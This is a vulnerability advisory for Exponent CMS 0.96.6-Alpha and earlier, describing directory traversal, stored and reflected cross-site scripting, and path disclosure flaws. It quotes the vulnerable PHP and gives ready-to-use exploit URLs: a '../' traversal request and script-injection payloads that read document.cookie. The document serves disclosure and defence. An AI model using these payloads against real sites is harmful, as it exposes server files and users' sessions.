Exponent Multiple Vulnerabilities

Exponent is a fully-featured, modern CMS written in PHP, that enables
non-technical people to manage and update their websites with minimal
effort.
Exponent is also an attractive development platform for traditional and
non-traditional web applications. it's great cms
http://www.exponentcms.org

Credit:
The information has been provided by Hamid Ebadi ( www.bugtraq.ir Iran
Security Research )
The original article can be found at :
http://www.bugtraq.ir/articles/advisory/exponent_multiple_vulnerabilities/10

Vulnerable:
Exponent exponent-0.96.6-Alpha and below

1 ) Exponent  Directory traversal (Exposure of sensitive information)

Input passed to the "icodir" parameters in "iconspopup.php" isn't properly
verified.
This can be exploited by malicious people to disclose sensitive information

(using "../" directory traversal character sequence.)

Vulnerable Code :
//line 40
define('ICONDIR',BASE.str_replace(PATH_RELATIVE,"",$_GET['icodir']));
.
.
.
    $dh = opendir(ICONDIR);
    $counter = 0;
    while (($file = readdir($dh)) !== false) {
        if (is_readable(ICONDIR.$file) && is_file(ICONDIR.$file)) {
            $iconfiles[$thisrow][] = $file;
            $counter++;
            if ($counter >= $perrow) {
                $counter = 0;
                $thisrow++;
                $iconfiles[$thisrow] = array();
            }
        }
    }
} else $good = false;
//
.
.
.
//line 73
<?php
for ($i = 0; $i < count($iconfiles); $i++) {
    echo '<tr>';
    for ($j = 0; $j < count($iconfiles[$i]); $j++) {
        echo '<td>';
        $imgsrc = $_GET['icodir'] . $iconfiles[$i][$j];
        echo "<a href='' onClick='setIcon(\"$imgsrc\"); return false'><img
src='$imgsrc' border='0' /></a>";
        echo '</td>';
    }
    echo '</tr>';
}


?>

exploit:
http://[exponent]/iconspopup.php?icodir=/../../../


2 ) Exponent Script Insertion

Input passed to the "body" in "weblogmodule" module (Weblog Comments) is not
properly sanitised before being used.
This can be exploited to insert arbitrary HTML and script code, which will
be executed in a user's browser session
in context of an affected site when a malicious entry is viewed.

3 ) Exponent Cross-Site Scripting Vulnerabilities
Input passed to the "url" parameter in
/external/magpierss/scripts/magpie_debug.php and
/external/magpierss/scripts/magpie_simple.php, the "rss_url" parameter in
/external/magpierss/scripts/magpie_slashbox.php is not properly sanitised
before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
and you can find many more if you want .

POC :
http://HOST/external/magpierss/scripts/magpie_debug.php?url=<script> alert(
document.cookie) </script>
http://HOST/external/magpierss/scripts/magpie_slashbox.php?rss_url=<script>
alert(document.cookie) </script>


4 ) Exponent Full Path Disclosure Weakness
The problem is that it is possible to disclose the full path to
"sdk/blanks/formcontrol.php" and "sdk/blanks/file_modules.php" by accessing
it directly.

# copyright : http://www.bugtraq.ir